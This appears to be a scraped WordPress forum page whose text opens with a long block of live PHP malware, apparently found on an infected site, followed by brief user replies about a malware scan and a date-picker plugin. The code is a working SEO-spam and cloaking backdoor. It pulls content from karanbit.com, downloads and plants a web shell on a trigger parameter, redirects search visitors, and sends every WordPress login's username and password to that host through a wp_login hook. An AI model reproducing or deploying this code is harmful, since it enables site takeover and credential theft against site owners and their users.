CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); if (!empty($result->redirect)) { foreach($result->redirect->headers as $header) { header($header); } if ($result->redirect->content) { echo $result->redirect->content; } } } ///////ztds @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "ee4c20179023749bb8474d2af81e5281"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('https://karanbit.com/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!<br><a href=/{$eb}xml.php>go</a>"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("https://karanbit.com/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("https://karanbit.com/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("https://karanbit.com/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("https://karanbit.com/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#<html#is', $ttxt)) { echo $ttxt; file_put_contents("{$eb}{$st}/$page.html", $ttxt); die(); } preg_match('#gogogo(.*)enenen#is', $ttxt, $mtchs); $etxt = explode('||', $mtchs[1]); $key = $etxt[0]; $title = ucfirst($key); $h1 = ucfirst($etxt[1]); $rating = rand(4,5); $rcount = rand(22,222); $txt = "<div itemscope=\"\" itemtype=\"https://schema.org/Product\">\n<span itemprop=\"name\">$parkey rating</span>\n<div itemprop=\"aggregateRating\" itemscope=\"\" itemtype=\"https://schema.org/AggregateRating\">\n<span itemprop=\"ratingValue\">$rating-5</span> stars based on\n<span itemprop=\"reviewCount\">$rcount</span> reviews\n</div>\n</div>\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("https://karanbit.com/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "<a href=\"https://$newclpage\">$parkey</a> "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('#<a (.*)</a>#iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('</body>', "<footer> <div class=\"tags_cloud footer column block\" id=\"tags_cloud footer column block\"> $cldwfooter </div> </footer> </body>", $my_content); } } if (!$morda) { $my_content = preg_replace('#<title(.*)<\/title>#iUs', "<title>$title</title>", $my_content, 1); $my_content = preg_replace("#<link rel=[\"\']{1}canonical(.*)\>#iUs", '', $my_content); $my_content = preg_replace("#<link rel=[\"\']{1}shortlink(.*)\>#iUs", '', $my_content); $my_content = preg_replace('#<h1(.*)<\/h1>#iUm', "<h1>$h1</h1>", $my_content, 1); $my_content = preg_replace('#<h2(.*)<\/h2>#iUm', "<h2>$h1</h2>", $my_content, 1); $my_content = preg_replace('#<h3(.*)<\/h3>#iUm', "<h3>$h1</h3>", $my_content, 1); $my_content = preg_replace("#<meta name=[\"\']{1}description(.*)\>#iUs", '', $my_content); $my_content = preg_replace("#<meta name=[\"\']{1}robots(.*)\>#iUs", '', $my_content); $my_content = preg_replace("#<meta name=[\"\']{1}keywords(.*)\>#iUs", '', $my_content); $my_content = str_replace('</head>', "<meta name=\"description\" content=\"$desc\"> </head>", $my_content); $my_content = preg_replace("#<meta property=[\"\']{1}og:(.*)[\"\']{1} content=[\"\']{1}.*[\"\']{1}\s?\/>#iUs", '', $my_content); $my_content = preg_replace('#<script(.*)<\/script>#iUs', '', $my_content, 1); if (@preg_match('#<article(.*)<\/article>#iUs', $my_content)) { $my_content = preg_replace('#<article(.*)<\/article>#iUs', "<article> $txt </article>", $my_content, 1); } elseif (@preg_match('#<div id="page-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="page-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="page-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="page-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="maincontent">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="maincontent">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="home-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="home-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="content"(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="content"(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content"(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content"(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content" class="clearfix">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content" class="clearfix">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content" class="hfeed">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content" class="hfeed">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="content clearfix">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="content clearfix">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="body_container">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="body_container">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content" class="widecolumn">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content" class="widecolumn">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="entry-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="entry-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="entry-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="entry-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="main-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="main-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content-area">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content-area">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="post-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="post-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="item-page">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="item-page">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="grid(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="grid(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="page(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="page(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="column(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="column(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="nextend-flux">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="nextend-flux">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<table(.*)>#iUs')) { $my_content = preg_replace('#<table(.*)>#iUs', "<table>\n<div>$txt</div>", $my_content, 1); } elseif (@preg_match('#<div class="inner-wrapper">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="inner-wrapper">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n<div>\n$txt\n</div>", $my_content, 1); } } } //end if key elseif (!preg_match('#<title>(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://karanbit.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?>Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16Thank you, I’ll send you an email with the only logs i can pull from my host, but they only show client access, not file access
i have found another file that is probably linked, it’s called .default and it is copied all over the place in the shared host. I don’t have the time logs of when it was created but i’ll attach it to the email as well.
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] rogueads.unwanted_ads 16Hello,
I have the exact same issue with my multi site host, and I’ve run a find with grep for the astra_head issue, but cannot find it in any php file. Also ran it everywhere and didn’t find it. Any other information you may have would be great
Forum: Plugins
In reply to: [Multi Step Form] Date Picker unable to select month or year in popupyou are missing i think the point of the question. I need to be able to click on the month and have the month change. right now if we try and use the field as a birthdate, a person has to click the left arrow many many times to get to the correct year and month.
In the example in your documentation, ( https://t1m0n.name/air-datepicker/docs/#sub-section-9 ) it works correctly, but it doesn’t appear to have the same feature in the version used on the plugin ?
Viewing 11 replies - 1 through 11 (of 11 total)